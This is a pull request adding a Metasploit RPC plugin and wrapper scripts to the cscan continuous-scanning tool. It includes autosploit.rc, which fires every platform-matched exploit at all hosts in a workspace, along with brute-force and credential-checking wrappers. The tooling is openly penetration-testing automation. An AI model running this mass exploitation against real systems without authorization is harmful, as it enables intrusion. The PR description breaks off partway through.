### PR TITLE
Cscan: msfrpc plugin

### DIFF
--- a/scripts/cscan/config.py
+++ b/scripts/cscan/config.py
@@ -6,8 +6,12 @@
 ###
 
 config = {
+            #Default setup
+            'CS_CATEGORIES': 'network,web',
+            'CS_SCRIPTS': 'nmap.sh,openvas.sh,nikto.sh,nessus.sh,w3af.sh',
             #NMAP
             'CS_NMAP' : "nmap",
+            'CS_NMAP_ARGS' : "-O",
             #OPENVAS
             'CS_OPENVAS_USER' : 'admin',
             'CS_OPENVAS_PASSWORD' : 'openvas',
@@ -18,6 +22,7 @@ config = {
             'CS_BURP' : '/root/tools/burpsuite_pro_v1.6.26.jar',
             #NIKTO
             'CS_NIKTO' : "nikto",
+            'CS_NIKTO_ARGS' : "",
             #W3AF
             'CS_W3AF' : "/root/tools/w3af/w3af_api",
             'CS_W3AF_PROFILE' : "/root/tools/w3af/profiles/fast_scan.pw3af",
@@ -28,5 +33,7 @@ config = {
             'CS_NESSUS_USER' : "nessus",
             'CS_NESSUS_PASS' : "nessus",
             'CS_NESSUS_PROFILE' : "Basic Network Scan",
+            # MSFRPC
+            'CS_MSF_TMP_WS' : 'enabled',
+            'CS_MSF_EXPORT' : 'enabled',
         }
-

--- a/scripts/cscan/plugin/msfrpc.py
+++ b/scripts/cscan/plugin/msfrpc.py
@@ -1,0 +1,267 @@
+#!/usr/bin/env python
+
+import os
+import time
+import string
+import random
+import argparse
+import msgpack
+import httplib
+import ssl
+
+class Msfrpc:
+    """ Msfrpc class from https://github.com/SpiderLabs/msfrpc """
+    class MsfError(Exception):
+        def __init__(self,msg):
+            self.msg = msg
+        def __str__(self):
+            return repr(self.msg)
+
+    class MsfAuthError(MsfError):
+        def __init__(self,msg):
+            self.msg = msg
+
+    def __init__(self,opts=[]):
+        self.host = opts.get("host") or "127.0.0.1"
+        self.port = opts.get("port") or 55552
+        self.uri = opts.get("uri") or "/api/"
+        self.ssl = opts.get("ssl") or False
+        self.authenticated = False
+        self.token = False
+        self.headers = {"Content-type" : "binary/message-pack" }
+        if self.ssl:
+            self.client = httplib.HTTPSConnection(self.host,self.port, context=ssl._create_unverified_context())
+        else:
+            self.client = httplib.HTTPConnection(self.host,self.port)
+
+    def encode(self,data):
+        return msgpack.packb(data)
+    def decode(self,data):
+        return msgpack.unpackb(data)
+
+    def call(self,meth,opts = []):
+        if meth != "auth.login":
+            if not self.authenticated:
+                raise self.MsfAuthError("MsfRPC: Not Authenticated")
+            opts.insert(0,self.token)
+
+        opts.insert(0,meth)
+        params = self.encode(opts)
+        self.client.request("POST",self.uri,params,self.headers)
+        resp = self.client.getresponse()
+        return self.decode(resp.read())
+
+    def login(self,user,password):
+        ret = self.call("auth.login",[user,password])
+        if ret.get("result") == "success":
+	    self.authenticated = True
+            self.token = ret.get("token")
+            return True
+        else:
+            raise self.MsfAuthError("MsfRPC: Authentication failed")
+
+class CscanMsf:
+    """ msfrpc plugin for cscan """
+    def __init__(self, client, logfile=False, quiet=False):
+        self.logfile = logfile
+        self.cid = None
+        self.quiet = quiet
+        self.client = client
+
+    def check_auth(self):
+        if not self.client or not self.client.authenticated:
+            self.log("ERROR: You are not authenticated..", True)
+            return False
+        return True
+
+    def log(self, msg, critical=False):
+        if self.logfile:
+            logfile = open(self.logfile, "a")
+            logfile.write("%s\n" % msg)
+            logfile.close()
+        if not self.quiet or critical:
+            print msg
+
+    def rpc_call(self, meth, opts, key=""):
+        if self.check_auth():
+            res = self.client.call(meth, opts)
+
+            if "error" in res:
+                self.log("ERROR: %s %s" % (res.get("error_code"), res.get("error_message")), True)
+                self.log("%s: %s\n%s" % (res.get("error_class"), res.get("error_string"), res.get("error_backtrace")))
+                return res
+            return res if not key else res.get(key)
+
+    def create_console(self):
+        self.cid = self.rpc_call("console.create", [{}], "id")
+        self.rpc_call("console.read", [self.cid])
+        self.log("Created console ID " + str(self.cid), True)
+        return self.cid
+
+    def destroy_console(self):
+        self.log("Destroy console ID %s.. %s" % (self.cid, self.rpc_call("console.destroy",
+                                                                         [self.cid], "result")), True)
+
+    def create_ws(self, ws, switch=False):
+        self.log("Create %s workspace.. %s" % (ws, self.rpc_call("db.add_workspace", [ws], "result")), True)
+        if switch:
+            self.set_ws(ws)
+        return ws
+
+    def set_ws(self, ws):
+        self.log("Switch to %s workspace.. %s" % (ws, self.rpc_call("db.set_workspace", [ws], "result")), True)
+
+    def destroy_ws(self, ws):
+        self.log("Delete %s workspace.. %s" % (ws, self.rpc_call("db.del_workspace", [ws], "result")), True)
+
+    def import_xml_data(self, ws, xml):
+        content = open(xml, "r").read()
+        self.log("Importing data from %s.. %s" % (xml, self.rpc_call("db.import_data", [{"workspace": ws,
+                                                                                         "data": content}], "result")), True)
+
+    def export_current_ws(self, out):
+        self.log("Exporting workspace..", True)
+        self.rpc_call("console.write", [self.cid, "db_export %s\r\n" % out])
+
+        while True:
+            time.sleep(5)
+            res = self.rpc_call("console.read", [self.cid])
+            if res.get("data"):
+                self.log("%s %s" % (res.get("prompt"), res.get("data")))
+            if "Finished export" in res.get("data"):
+                return True
+
+    def wait_for_jobs(self):
+        while True:
+            job_list = self.rpc_call("job.list", [])
+            self.log("Current jobs: %s (Total: %d)" % (",".join(job_list), len(job_list)), True)
+            if len(job_list) > 0:
+                for j in job_list:
+                    jinfo = self.rpc_call("job.info", [j])
+                    self.log("%s - %s" % (jinfo.get("jid"), jinfo.get("name")), True)
+            else:
+                return True
+            time.sleep(10)
+
+    def run_commands(self, commands):
+        self.log("Deploy following commands: \n%s" % " msf> " + "\n msf> ".join(commands), True)
+        self.rpc_call("console.write", [self.cid, "\n".join(commands)])
+        self.rpc_call("console.write", [self.cid, "set PROMPT commands_deployed\r\n"])
+
+        while True:
+            time.sleep(2)
+            res = self.rpc_call("console.read", [self.cid])
+            if res.get("data"):
+                self.log("%s %s" % (res.get("prompt"), res.get("data")))
+            if "commands_deployed" in res["prompt"] and not res["busy"]:
+                self.rpc_call("console.write", [self.cid, "set PROMPT msfcscan\r\n"])
+                break
+
+def banner(args, cws="unknown"):
+    return """   _____________________________________________________
+  |  ____  ___________________________________________  |
+  | | |  \/  |/  ___|  ___/  __ \                     | |
+  | | | .  . |\ `--.| |_  | /  \/___  ___ __ _ _ __   | |
+  | | | |\/| | `--. \  _| | |   / __|/ __/ _` | '_ \  | |
+  | | | |  | |/\__/ / |   | \__/\__ \ (_| (_| | | | | | |
+  | | \_|  |_/\____/\_|    \____/___/\___\__,_|_| |_| | |
+  | |  _____ ______ ______ _____ ______ ______ _____  | |
+  | | |_____|______|______|_____|______|______|_____| |_|
+  | |
+  | | Arguments:                 Current workspace: %s
+  | |  > Temp workspace: %s
+  | |  > Quiet mode: %s
+  | |  > Command: %s
+  | |  > Resource: %s
+  | |  > Options: %s
+  | |  > Modules: %s
+  |_|  > XML import: %s
+       > Log file: %s
+       > Output file: %s
+
+""" % (
+    cws,
+    "enabled" if not args.disable_tmp_ws else "disabled",
+    "enabled" if args.quiet else "disabled",
+    args.command,
+    args.resource,
+    "\n  | |    --> " + args.options.replace(":", "\n  | |    --> ") if args.options else None,
+    "\n  | |    --> " + args.modules.replace(",", "\n  | |    --> ") if args.modules else None,
+    args.xml,
+    args.log,
+    args.output
+)
+
+def main():
+    parser = argparse.ArgumentParser(description="msfrpc cscan plugin, for automated security testing")
+    parser.add_argument("-H","--msfrpc-host", help="Override MSFRPC_HOST envvar", required=False)
+    parser.add_argument("-P","--msfrpc-port", help="Override MSFRPC_PORT envvar", required=False)
+    parser.add_argument("-u","--msfrpc-user", help="Override MSFRPC_USER envvar", required=False)
+    parser.add_argument("-p","--msfrpc-pass", help="Override MSFRPC_PASS envvar", required=False)
+    parser.add_argument("-S","--msfrpc-ssl", help="Override MSFRPC_SSL envvar", required=False, action="store_true")
+    parser.add_argument("-U","--msfrpc-uri", help="Override MSFRPC_URI envvar", required=False)
+
+    parser.add_argument("-o","--output", help="Output file", required=False)
+    parser.add_argument("-l","--log", help="Log file", required=False)
+    parser.add_argument("-x","--xml", help="XML to import in temp workspace", required=False)
+    parser.add_argument("-m","--modules", help="Modules to use", required=False)
+    parser.add_argument("-r","--resource", help="Resource to execute", required=False)
+    parser.add_argument("-O","--options", help="Modules options", required=False)
+    parser.add_argument("-c","--command", help="Command to execute (check, run, exploit)", default="check")
+    parser.add_argument("-T","--disable-tmp-ws", help="Do not create temp workspace and use current", required=False, action="store_true")
+    parser.add_argument("-q","--quiet", help="Quiet mode, set -l options to have log in a file", required=False, action="store_true")
+
+    args = parser.parse_args()
+    try:
+        client = Msfrpc({
+            "host": args.msfrpc_host if args.msfrpc_host else os.environ.get("MSFRPC_HOST"),
+            "port": args.msfrpc_port if args.msfrpc_port else os.environ.get("MSFRPC_PORT"),
+            "uri": args.msfrpc_uri if args.msfrpc_uri else os.environ.get("MSFRPC_URI"),
+            "ssl": args.msfrpc_ssl if args.msfrpc_ssl else os.environ.get("MSFRPC_SSL") == 'true'
+        })
+        client.login(args.msfrpc_user if args.msfrpc_user else os.environ.get("MSFRPC_USER"),
+                     args.msfrpc_pass if args.msfrpc_pass else os.environ.get("MSFRPC_PASS"))
+    except:
+        print "ERROR: Cannot connect to server.."
+        exit(1)
+
+    cscan = CscanMsf(client, args.log, args.quiet)
+    commands = []
+    tmp_ws = None
+    current_ws = cscan.rpc_call("db.current_workspace", [], "workspace")
+
+    print banner(args, current_ws)
+    cscan.create_console()
+
+    if not args.disable_tmp_ws and os.environ.get("CS_MSF_TMP_WS") == "enabled":
+        tmp_ws = "cscan_" + "".join(random.sample(string.lowercase,6))
+        cscan.create_ws(tmp_ws, True)
+        if args.xml:
+            cscan.import_xml_data(tmp_ws, args.xml)
+
+    if args.options:
+        for option in args.options.split(":"):
+            commands.append("setg " + option.replace("=", " "))
+    if args.modules:
+        for module in args.modules.split(","):
+            commands.append("use " + module)
+            commands.append("show options")
+            commands.append(args.command)
+    elif args.resource:
+        commands.append("resource " + args.resource)
+
+    commands.append("\r\n")
+    cscan.run_commands(commands)
+    cscan.wait_for_jobs()
+
+    if os.environ.get("CS_MSF_EXPORT") == "enabled" and args.output:
+        cscan.export_current_ws(args.output)
+
+    cscan.destroy_console()
+
+    if tmp_ws:
+        cscan.set_ws(current_ws)
+        cscan.destroy_ws(tmp_ws)
+
+if __name__ == "__main__":
+    main()

--- a/scripts/cscan/scripts/extra/msf-auto-cred-checker.sh
+++ b/scripts/cscan/scripts/extra/msf-auto-cred-checker.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --xml $xml \
+                   --resource auto_cred_checker.rc \
+                   --options THREADS=100
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/extra/msf-autobrute.sh
+++ b/scripts/cscan/scripts/extra/msf-autobrute.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --xml $xml \
+                   --resource auto_brute.rc \
+                   --options THREADS=100
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/extra/msf-autoexploit-check.sh
+++ b/scripts/cscan/scripts/extra/msf-autoexploit-check.sh
@@ -1,0 +1,22 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+modules_file=msf-modules.txt
+
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+elif ! test -f $modules_file; then
+    echo no modules file found
+    exit 2
+fi
+
+while read m; do
+    NAME="$(date +%s)-$(basename $0)"
+    echo "Run msfrpc plugin.."
+    ./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                       --log $(realpath $3$NAME.log) \
+                       --xml $xml \
+                       --resource autoexploit.rc \
+                       --options MODE=check:MODULE=$m
+done <$modules_file

--- a/scripts/cscan/scripts/extra/msf-autoexploit-dry.sh
+++ b/scripts/cscan/scripts/extra/msf-autoexploit-dry.sh
@@ -1,0 +1,22 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+modules_file=msf-modules.txt
+
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+elif ! test -f $modules_file; then
+    echo no modules file found
+    exit 2
+fi
+
+while read m; do
+    NAME="$(date +%s)-$(basename $0)"
+    echo "Run msfrpc plugin.."
+    ./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                       --log $(realpath $3$NAME.log) \
+                       --xml $xml \
+                       --resource autoexploit.rc \
+                       --options MODE=dry:MODULE=$m
+done <$modules_file

--- a/scripts/cscan/scripts/extra/msf-autoexploit.sh
+++ b/scripts/cscan/scripts/extra/msf-autoexploit.sh
@@ -1,0 +1,22 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+modules_file=msf-modules.txt
+
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+elif ! test -f $modules_file; then
+    echo no modules file found
+    exit 2
+fi
+
+while read m; do
+    NAME="$(date +%s)-$(basename $0)"
+    echo "Run msfrpc plugin.."
+    ./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                       --log $(realpath $3$NAME.log) \
+                       --xml $xml \
+                       --resource autoexploit.rc \
+                       --options MODE=exploit:MODULE=$m
+done <$modules_file

--- a/scripts/cscan/scripts/extra/msf-autosploit.sh
+++ b/scripts/cscan/scripts/extra/msf-autosploit.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+		           --log $(realpath $3$NAME.log) \
+		           --xml $xml \
+		           --resource $(realpath scripts/resources/autosploit.rc) \
+		           --options THREADS=100:TARGET_PLATFORM=aix,android,bsdi,dialup,firefox,freebsd,hpux,irix,linux,mainframe,multi,netware,solaris,unix,windows:BLACKLIST=freebsd/samba/trans2open,linux/samba/trans2open,osx/samba/trans2open,solaris/samba/trans2open
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/extra/msf-modules-list.sh
+++ b/scripts/cscan/scripts/extra/msf-modules-list.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+modules_file=msf-modules.txt
+if ! test -f $modules_file; then
+    echo no modules file found
+    exit 1
+fi
+
+while read h; do
+    NAME="$(date +%s)-$(basename $0)-$h"
+    echo "Run msfrpc plugin.."
+    ./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                       --log $(realpath $3$NAME.log) \
+                       --modules $(sed ':a;N;$!ba;s/\n/,/g' $modules_file) \
+                       --options RHOSTS=$h:RHOST=$h \
+                       --command=run
+done <$1

--- a/scripts/cscan/scripts/extra/msf-mssql-brute.sh
+++ b/scripts/cscan/scripts/extra/msf-mssql-brute.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --xml $xml \
+                   --resource mssql_brute.rc \
+                   --options THREADS=100
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/extra/msf-nessus-vulns-cleaner.sh
+++ b/scripts/cscan/scripts/extra/msf-nessus-vulns-cleaner.sh
@@ -1,0 +1,16 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --resource nessus_vulns_cleaner.rc \
+                   --xml $xml
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/extra/msf-port-cleaner.sh
+++ b/scripts/cscan/scripts/extra/msf-port-cleaner.sh
@@ -1,0 +1,16 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log)
+                   --resource port_cleaner.rc \
+                   --xml $xml
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/network/msf-autoscan.sh
+++ b/scripts/cscan/scripts/network/msf-autoscan.sh
@@ -1,0 +1,18 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+		           --log $(realpath $3$NAME.log) \
+		           --xml $xml \
+		           --resource $(realpath scripts/resources/autoscan.rc) \
+		           --options MAX_LEN=100:THREADS=100:BLACKLIST=scanner/telnet/brocade_enable_login,scanner/rogue/rogue_recv \
+		           --quiet
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/network/msf-basic-discovery-nmap.sh
+++ b/scripts/cscan/scripts/network/msf-basic-discovery-nmap.sh
@@ -1,0 +1,10 @@
+#!/bin/bash
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --resource basic_discovery.rc \
+                   --options THREADS=100:NMAP=true:NMAPOPTS="$CS_NMAP_ARGS":RHOSTS=$(sed ':a;N;$!ba;s/\n/,/g' $1)
+
+cp $2$NAME.xml msf-workspace.xml

--- a/scripts/cscan/scripts/network/msf-basic-discovery.sh
+++ b/scripts/cscan/scripts/network/msf-basic-discovery.sh
@@ -1,0 +1,10 @@
+#!/bin/bash
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --resource basic_discovery.rc \
+                   --options THREADS=100:NMAP=false:RHOSTS=$(sed ':a;N;$!ba;s/\n/,/g' $1)
+
+cp $2$NAME.xml msf-workspace.xml

--- a/scripts/cscan/scripts/network/msf-portscan-nmap.sh
+++ b/scripts/cscan/scripts/network/msf-portscan-nmap.sh
@@ -1,0 +1,10 @@
+#!/bin/bash
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --resource portscan.rc \
+                   --options THREADS=100:NMAP=true:NMAPOPTS=$CS_NMAP_ARGS:RHOSTS=$(sed ':a;N;$!ba;s/\n/,/g' $1)
+
+cp $2$NAME.xml msf-workspace.xml

--- a/scripts/cscan/scripts/network/msf-portscan.sh
+++ b/scripts/cscan/scripts/network/msf-portscan.sh
@@ -1,0 +1,10 @@
+#!/bin/bash
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --resource portscan.rc \
+                   --options THREADS=100:NMAP=false:RHOSTS=$(sed ':a;N;$!ba;s/\n/,/g' $1)
+
+cp $2$NAME.xml msf-workspace.xml

--- a/scripts/cscan/scripts/network/nmap.sh
+++ b/scripts/cscan/scripts/network/nmap.sh
@@ -6,4 +6,4 @@
 ###
 
 NAME="nmap_$(date +%s).xml"
-${CS_NMAP:=nmap} -iL $1 -oX $2$NAME
+${CS_NMAP:=nmap} $CS_NMAP_ARGS -iL $1 -oX $2$NAME

--- a/scripts/cscan/scripts/resources/autoscan.rc
+++ b/scripts/cscan/scripts/resources/autoscan.rc
@@ -1,0 +1,68 @@
+# autoscan.rc
+# Author: Sliim (Github: @Sliim / Twitter: @_Sliim_)
+
+# This Metasploit resource script will run several auxiliary scanners
+# against present hosts in current workspace. It get all services for
+# all hosts, and try to find auxiliary modules starting with `scanner/`
+# where default RPORT option match with a service.
+# We can blacklist some modules we don't want, the BLACKLIST option
+# is a comma separated list of module to disable.
+
+<ruby>
+begin
+  framework.db.hosts
+rescue ::ActiveRecord::ConnectionNotEstablished
+  print_error("Database connection isn't established")
+  return
+end
+
+# Check for blacklisted modules
+blacklist = []
+if (framework.datastore['BLACKLIST'] != nil)
+   blacklist = framework.datastore['BLACKLIST'].split(',')
+end
+
+scanners = {}
+count = 0
+ran = 0
+
+print_status("Getting scanners list, this may take a while...")
+framework.db.hosts.each do |host|
+  port_list = []
+  scanners[host.address] = []
+  print_status("Host: #{host.address} - #{host.os_name}")
+  print_status("Services: ")
+  host.services.each do |serv|
+    next if not serv.host
+    next if (serv.state != Msf::ServiceState::Open)
+    print_status("> :#{serv.port.to_i} - #{serv.proto} - #{serv.name}")
+    port_list << serv.port.to_i if not port_list.include? serv.port.to_i
+  end
+
+  framework.modules.auxiliary.each do |name, mod|
+    next if blacklist.include? name
+    next if not name.starts_with? "scanner/"
+    next unless mod
+    m = mod.new
+    next unless m.datastore.has_key? 'RPORT'
+    if port_list.include? m.datastore['RPORT'].to_i
+      scanners[host.address] << name
+      count += 1
+    end
+  end
+end
+
+print_status("Ok! Launching #{count} scanners..")
+scanners.each do |host, s|
+  s.each do |scanner|
+    print_line("[#{ran+1}/#{count}] Deploying auxiliary #{scanner} against #{host}")
+    run_single("use #{scanner}")
+    run_single("set RHOSTS #{host}")
+    run_single("show options")
+    run_single("run")
+    ran += 1
+  end
+end
+
+print_status("Done. Deployed #{ran} scanners.")
+</ruby>

--- a/scripts/cscan/scripts/resources/autosploit.rc
+++ b/scripts/cscan/scripts/resources/autosploit.rc
@@ -1,0 +1,84 @@
+# autosploit.rc
+# Author: Sliim (Github: @Sliim / Twitter: @_Sliim_)
+
+# This Metasploit resource script will run several exploits against
+# present hosts in current workspace. It get all services for all hosts,
+# and try to find exploits where default RPORT option match with a service.
+# We can blacklist some modules we don't want, the BLACKLIST option is a
+# comma separated list of module to disable.
+# The TARGET_PLATFORM option can be used to define which platform we target
+# (ex: if all hosts are linux os, no need to launch windows exploits).
+# Tested on metasploitable 2. Got 6/7 shells without effort :)
+
+<ruby>
+begin
+  framework.db.hosts
+rescue ::ActiveRecord::ConnectionNotEstablished
+  print_error("Database connection isn't established")
+  return
+end
+
+# Check for target platform list
+if (framework.datastore['TARGET_PLATFORM'] == nil)
+  run_single("setg TARGET_PLATFORM aix,android,apple_ios,bsdi,dialup,firefox,freebsd,hpux,irix,linux,mainframe,multi,netware,osx,solaris,unix,windows")
+end
+
+# Check for blacklisted modules
+blacklist = []
+if (framework.datastore['BLACKLIST'] != nil)
+   blacklist = framework.datastore['BLACKLIST'].split(',')
+end
+
+sploits = {}
+count = 0
+ran = 0
+
+print_status("Getting vulns list, this may take a while...")
+framework.db.hosts.each do |host|
+  port_list = []
+  sploits[host.address] = []
+  print_status("Host: #{host.address} - #{host.os_name}")
+  print_status("Services: ")
+  host.services.each do |serv|
+    next if not serv.host
+    next if (serv.state != Msf::ServiceState::Open)
+    print_status("> :#{serv.port} - #{serv.proto} - #{serv.name}")
+    port_list << serv.port.to_i if not port_list.include? serv.port.to_i
+  end
+
+  framework.modules.exploits.each do |name, mod|
+    next if not framework.datastore['TARGET_PLATFORM'].split(',').include? name.split('/')[0]
+    next if blacklist.include? name
+
+    # TODO Improve platform detection / exploit selection
+    if host.os_name
+      next if name.split('/')[0] == 'windows' && ! host.os_name.match(/Windows/)
+      next if name.split('/')[0] != 'windows' && host.os_name.match(/Windows/)
+    end
+    next unless mod
+    m = mod.new
+    next unless m.datastore.has_key? 'RPORT'
+    if port_list.include? m.datastore['RPORT'].to_i
+      sploits[host.address] << name
+      count += 1
+    end
+  end
+end
+
+print_status("Ok dude! I found #{count} matching sploits! #{'Take a beer!' if count > 100}")
+
+sploits.each do |host, s|
+  s.each do |sploit|
+    print_status("[#{ran+1}/#{count}] Deploying exploit #{sploit} against #{host}")
+    run_single("use #{sploit}")
+    run_single("set RHOST #{host}")
+    run_single("set LPORT #{4444 + rand(65535-44444)}")
+    run_single("show options")
+    run_single("exploit -z")
+    ran += 1
+    print_status('Take another beer ;)') if ran % 100 == 0
+  end
+end
+
+print_status("Done. Tried #{ran}/#{count} exploits.")
+</ruby>

--- a/scripts/cscan/scripts/web/msf-autocrawler.sh
+++ b/scripts/cscan/scripts/web/msf-autocrawler.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --xml $xml \
+                   --resource autocrawler.rc \
+                   --options THREADS=100
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/web/msf-http-dir.sh
+++ b/scripts/cscan/scripts/web/msf-http-dir.sh
@@ -1,0 +1,13 @@
+#!/bin/bash
+
+while read h; do
+    NAME="$(date +%s)-$(basename $0)"
+    HOST=$(echo $h | cut -d/ -f3 | cut -d: -f1)
+    PORT=$(echo $h | cut -d/ -f3 | cut -d: -f2)
+    echo "Run msfrpc plugin.."
+    ./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                       --log $(realpath $3$NAME.log) \
+                       --modules auxiliary/scanner/http/dir_scanner \
+                       --options RHOSTS=$HOST:RPORT=$PORT \
+                       --command=run
+done <$1

--- a/scripts/cscan/scripts/web/msf-wmap-autotest.sh
+++ b/scripts/cscan/scripts/web/msf-wmap-autotest.sh
@@ -1,0 +1,17 @@
+#!/bin/bash
+
+xml=msf-workspace.xml
+if ! test -f $xml; then
+    echo XML file $xml not found
+    exit 1
+fi
+
+NAME="$(date +%s)-$(basename $0)"
+echo "Run msfrpc plugin.."
+./plugin/msfrpc.py --output $(realpath $2$NAME.xml) \
+                   --log $(realpath $3$NAME.log) \
+                   --xml $xml \
+                   --resource wmap_autotest.rc \
+                   --options THREADS=100:WMAP_PROFILE=profile
+
+cp $2$NAME.xml $xml

--- a/scripts/cscan/scripts/web/nikto.sh
+++ b/scripts/cscan/scripts/web/nikto.sh
@@ -6,5 +6,5 @@
 ###
 while read h; do
     NAME="nikto_$(date +%s).xml"
-    ${CS_NIKTO:=nikto} -host $h -output $2$NAME -Format XML
+    ${CS_NIKTO:=nikto} $CS_NIKTO_ARGS -host $h -output $2$NAME -Format XML
 done <$1


### PR DESCRIPTION
Hi :)

I created a msfrpc plugin to allow your script `cscan` to interact with Metasploit RPC server. Originally this was a pull request on [cscan repository](https://github.com/infobyte/cscan/pull/1), I ported my changes in the faraday source code directly. Here is details:
## config.py additions

I added some keys for cscan configuration:
- `CS_CATEGORIES` - Comma separated list of categories to use for continous scanning. The categories are names of `scripts/` subdirectories, which will be added to `PATH` envvar
- `CS_SCRIPTS` - Comma separated list of scripts to run
- `CS_NMAP_ARGS` - String of arguments to pass to nmap (nmap.sh was updated to use this configuration key)
- `CS_NIKTO_ARGS` - String of arguments to pass to nikto (nikto.sh was updated to use this configuration key)
- `CS_MSF_TMP_WS` - `enable`/`disable` temporary workspace in msfrpc plugin
- `CS_MSF_EXPORT` - `enable`/`disable` workspace export in msfrpc plugin
## cscan.py additions

I added some script arguments to `cscan.py`:

```
# ./cscan.py --help
usage: cscan.py [-h] [-s SCRIPT] [-S SCRIPTS] [-c CATEGORY] [-t TARGETS]
                [-o OUTPUT] [-l LOG]

continues scanning on Faraday

optional arguments:
  -h, --help            show this help message and exit
  -s SCRIPT, --script SCRIPT
                        Scan only the following script ej: ./cscan.py -p
                        nmap.sh
  -S SCRIPTS, --scripts SCRIPTS
                        Scan the following scripts list ej: ./cscan.py -p
                        nmap.sh,nikto.sh
  -c CATEGORY, --category CATEGORY
                        Scan only for given category ej: ./cscan.py -c network
  -t TARGETS, --targets TARGETS
                        Choose a custom target list ej: ./cscan.py -t custom-
                        list.txt
  -o OUTPUT, --output OUTPUT
                        Choose a custom output directory
  -l LOG, --log LOG     Choose a custom log directory
```

Note: I replaced the `--plugin` argument to `--script` because this arg will run a script, not a plugin.
## cscan.py changes

I modified the `cscan.py` design to implement above `cscan` options & script arguments. Do no hesitate to review changes and give me feedbacks ;). Typically it does:
- Check for `output` & `log` directories, cscan will create missing directories
- Check which scripts will be ran, priority order:
  - `--script` cscan argument
  - `--scripts` cscan argument
  - `CS_SCRIPTS` cscan option
- Each `categories` path is added to the environment variable `PATH`
- Run each defined scripts
## plugins/msfrpc.py

This is my plugin request :). We can use this plugin to build some scripts that will interact with our Metasploit RPC server:

```
# plugin/msfrpc.py --help
usage: msfrpc.py [-h] [-H MSFRPC_HOST] [-P MSFRPC_PORT] [-u MSFRPC_USER]
                 [-p MSFRPC_PASS] [-S] [-U MSFRPC_URI] [-o OUTPUT] [-l LOG]
                 [-x XML] [-m MODULES] [-r RESOURCE] [-O OPTIONS] [-c COMMAND]
                 [-T] [-q]

msfrpc cscan plugin, for automated security testing

optional arguments:
  -h, --help            show this help message and exit
  -H MSFRPC_HOST, --msfrpc-host MSFRPC_HOST
                        Override MSFRPC_HOST envvar
